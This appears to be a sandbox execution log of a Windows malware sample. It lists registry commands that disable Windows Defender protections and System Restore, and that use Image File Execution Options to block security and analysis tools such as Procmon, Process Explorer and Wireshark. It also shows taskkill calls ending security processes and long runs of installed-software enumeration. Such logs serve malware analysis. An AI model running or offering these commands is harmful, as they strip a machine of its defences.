C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1852
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1904
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1932
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1920
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2040
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:2016
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:324
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1380
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1900
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1912
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1620
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1788
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1484
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1560
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1060
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:464
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1624
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1516
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:744
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1756
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1496
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1180
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1104
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:2040
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1920
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1900
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:652
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1776
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1608
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1824
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:296
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1076
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1752
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1940
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1976
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1568
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1484
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1560
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1856
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1496
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1176
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1180
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:1920
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1780
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1912
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:296
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1692
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:464
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:2016
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1860
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1864
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1944
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:1856
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:672
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1624
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1928
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1780
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1340
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1912
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:1940
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:2004
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1916
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1932
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1632
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:464
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:540
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1396
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1816
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:1868
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:1936
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1552
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:1620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1608
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:1692
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1836
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:844
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1580
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1908
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:464
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:520
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1692
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:320
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1972
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1396
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:744
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:1772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1332
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1580
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1592
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1472
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:2012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1736
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1540
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1940
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1960
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1060
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1808
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:2032
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1540
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:464
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1500
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:456
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:792
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1868
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2012
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1940
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1532
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:480
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1872
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1176
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1056
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:2004
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1928
-
